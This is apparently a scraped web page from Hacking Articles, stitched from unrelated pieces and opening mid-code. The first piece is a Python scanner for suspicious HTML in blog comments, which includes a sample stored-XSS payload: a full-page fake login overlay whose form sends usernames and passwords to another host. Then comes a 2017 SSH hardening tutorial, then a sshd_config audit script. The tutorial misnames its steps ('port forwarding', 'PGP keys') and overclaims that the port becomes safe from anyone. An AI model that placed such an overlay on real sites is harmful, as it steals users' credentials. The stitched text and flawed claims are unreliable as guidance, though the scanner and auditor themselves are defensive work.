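    return "<p>Welcome %s %s</p>" % (html.escape(first), html.escape(last))

RISKY_TAGS = {"script", "iframe", "form", "object", "embed"}

class StoredEntryScanner(HTMLParser):
    """Lists markup a blog comment should never carry: script/form-like tags,
    forms posting to another host, full-page overlays and inline script handlers."""
    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in RISKY_TAGS:
            self.findings.append("tag:" + tag)
        if tag == "form" and a.get("action"):
            host = urlparse(a["action"]).hostname
            if host and host != self.site_host:
                self.findings.append("form posts to " + host)
        style = (a.get("style") or "").replace(" ", "").lower()
        if "position:absolute" in style or "position:fixed" in style:
            self.findings.append("overlay via " + tag + " style")
        if any(k.startswith("on") or (v or "").strip().lower().startswith("javascript:")
               for k, v in a.items()):
            self.findings.append("script handler on " + tag)

def scan_stored_entry(entry: str, site_host: str) -> list:
    """Findings for one stored entry; an empty list means nothing suspicious."""
    scanner = StoredEntryScanner(site_host)
    scanner.feed(entry)
    return scanner.findings

# The post's stored payload, shortened (constructed sample input for the scanner).
STORED_PAYLOAD = ('<div style="position: absolute; left: 0px; top: 0px; width: 1900px; '
                  'height: 1300px; z-index: 1000; background-color:white;">'
                  'Please login with valid credentials:<br>'
                  '<form name="login" action="http://192.168.1.104/login.htm">'
                  '<input type="text" name="username"/>'
                  '<input type="text" name="password"/>'
                  '<input type="submit" value="Login"/></form></div>')
```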

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.


How to setup SSH Pentest Lab

Fri, 21/Jul/2017 - 14:05

Probing through every open port is practically the first step hackers take in order to prepare their attack. In order to work, one is required to keep ports open, but at the same time one is threatened by the fear of hackers. Therefore, one must learn to secure ports even if they are open.

In this article we will secure the SSH port so that even if it’s open no one will be able to exploit it. First of all, let’s install the SSH server using the following command:
sudo apt-get install openssh-server

Once the server is installed start SSH service by typing:

service ssh start

To confirm the working of SSH, use the following command:

service ssh status

As the service of SSH is started, scan it in your kali’s terminal using nmap:

nmap -sV 192.168.1.17

The scan will show that port 22 is open with the SSH service. Configure this port using PuTTY. For configuration in PuTTY, give the IP address in Host Name along with the port number, select SSH and finally click Open.

Upon opening, it will ask for the password; give the password and press Enter.

How to Secure SSH Connection

Now that SSH has been configured, we can apply our first measure of security, i.e. port forwarding (moving SSH off its default port). In computer>etc>ssh you will find a file named “sshd_config”.

Open this file and where it says Port 22, change it to Port 2222.

This way we have forwarded the SSH service from port 22 to port 2222. Let’s check it with nmap to confirm.

nmap -sV 192.168.1.17

SSH Connection using PGP Keys

This way we have applied our first measure of security. Now for our second measure of security, download and install PuTTY Key Generator. Open it and click the Generate button at the lower right.

This will generate a public and private key. Of these, save the private key.

The private key will be saved as shown in the following image. You can rename it as you like; I have named it ssh login key.

Now open a terminal on your server and type:

ssh-keygen

The command above creates a folder named .ssh; then create an empty text file named authorized_keys in the same folder.

Copy the “ssh login key.ppk” file created previously into the .ssh folder.

In the terminal, move into the .ssh folder and type the following command:

puttygen -L "ssh login key.ppk"

This command prints the public key in OpenSSH format. Copy this key into the empty authorized_keys file we created earlier.

Then in the PuTTY configuration, go to Connection > Data and give the Auto-login username.

Then open Connection > SSH > Auth and give the path of the SSH login key (the private key that was generated).

And then in the Session tab give the IP address and the port number, which is now 2222 due to our first measure of security.

And then click Open. It will open without asking for a password, as you have configured the key.

But this doesn’t mean it can’t be opened using a password, and we are still vulnerable to hackers. Therefore we are going to apply the third measure of security, i.e. disabling password authentication completely. For this, go to computer>etc>ssh>sshd_config.

Here, change PasswordAuthentication from yes (as shown in the image above) to no and uncomment it (as shown in the image below).

And now that we have successfully applied three measures of security our port is safe from anyone and everyone. To use this port the hacker would require physical access to your hardware, which is impossible. And if you want to access SSH from another machine then just configure the same key on that PC too and it will have access.
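A small audit of the sshd_config settings the three measures above change (listening port, key-based login, password login disabled), with the PAM keyboard-interactive caveat that can leave a password prompt in place even after PasswordAuthentication no, as an added example that is not code from the original post. Both sample configs are constructed and the function names are hypothetical.

```python
"""Added example (not code from the Hacking Articles post): parse sshd_config the
way sshd reads it and report which of the post's hardening steps are missing.
BEFORE/AFTER are constructed samples; function names are hypothetical."""

def parse_sshd_config(text: str) -> dict:
    """Effective global directives. Like sshd: the FIRST value of a repeated
    keyword wins (later duplicates are ignored), '#' lines are comments, several
    Port lines are allowed, and parsing stops at the first Match block."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break
        if key == "port":
            conf.setdefault("port", []).append(value)
        elif key not in conf:
            conf[key] = value
    return conf

def audit_sshd_config(text: str) -> list:
    """Findings against the post's three measures; an empty list means all applied.
    Defaults mirror OpenSSH: Port 22, Pubkey yes, Password yes, ChallengeResponse yes."""
    conf = parse_sshd_config(text)
    findings = []
    if "22" in conf.get("port", ["22"]):
        findings.append("sshd listens on the default port 22")
    if conf.get("pubkeyauthentication", "yes").lower() != "yes":
        findings.append("PubkeyAuthentication is disabled; key login will fail")
    if conf.get("passwordauthentication", "yes").lower() != "no":
        findings.append("PasswordAuthentication is not set to no (default is yes)")
    if conf.get("challengeresponseauthentication", "yes").lower() != "no":
        findings.append("ChallengeResponseAuthentication is not no; keyboard-interactive "
                        "login may still ask for a password via PAM")
    return findings

# Constructed 'before' config: stock file with the directives still commented out.
BEFORE = """\
# sshd_config (constructed sample)
#Port 22
#PubkeyAuthentication yes
#PasswordAuthentication yes
"""

# Constructed 'after' config: the post's three changes plus the PAM caveat closed.
AFTER = """\
Port 2222
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
PasswordAuthentication no
ChallengeResponseAuthentication no
"""
```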

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.
